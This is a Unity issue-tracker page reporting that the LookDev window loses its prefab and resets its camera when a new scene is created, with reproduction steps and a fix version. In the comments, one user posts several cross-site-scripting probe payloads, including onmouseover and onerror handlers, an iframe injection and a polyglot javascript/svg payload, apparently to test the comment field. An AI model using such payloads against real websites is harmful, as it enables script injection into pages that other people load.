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Fixed in 2017.3.0f3



Found in


Issue ID




LookDev camera/objects is reset upon creating new unity scene

Graphics - General


Steps to reproduce:

1. Create new project
2. Add Cube to scene and make prefab out of it
3. Open LookDev window
4. Change to split-screen mode
5. Drag cube into it and rotate camera
6. Back in main editor, click File > New Scene
7. Click Don't save and notice that once new scene is created LookDev window looses prefab and its camera is reset

Reproduced with: 2017.1.0p2, 2017.3.0a4

Comments (10)

  1. worldwhiteamway373839

    Mar 12, 2018 22:32

    joy COMMENT

  2. kerem0

    Jan 23, 2018 12:03

    <A »
    HREF="http://www.gohttp://ww »">XSS< »

  3. kerem0

    Jan 23, 2018 12:01

    "><a href="" onmouseover=alert(1)></a>

  4. kerem0

    Jan 23, 2018 12:00

    <a href="" onmouseover=alert(1)></a>

  5. kerem0

    Jan 23, 2018 11:59

    "><iframe width="420" height="315" src="" onmouseover=alert(1)></iframe><video id="sampleMovie" src="" controls><img src=x onerror=alert(1)></video>

  6. kerem0

    Jan 23, 2018 11:59


    jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e


  7. kerem0

    Jan 23, 2018 11:58


  8. kerem0

    Jan 23, 2018 11:58


  9. kerem0

    Jan 23, 2018 11:57


  10. kerem0

    Jan 23, 2018 11:57


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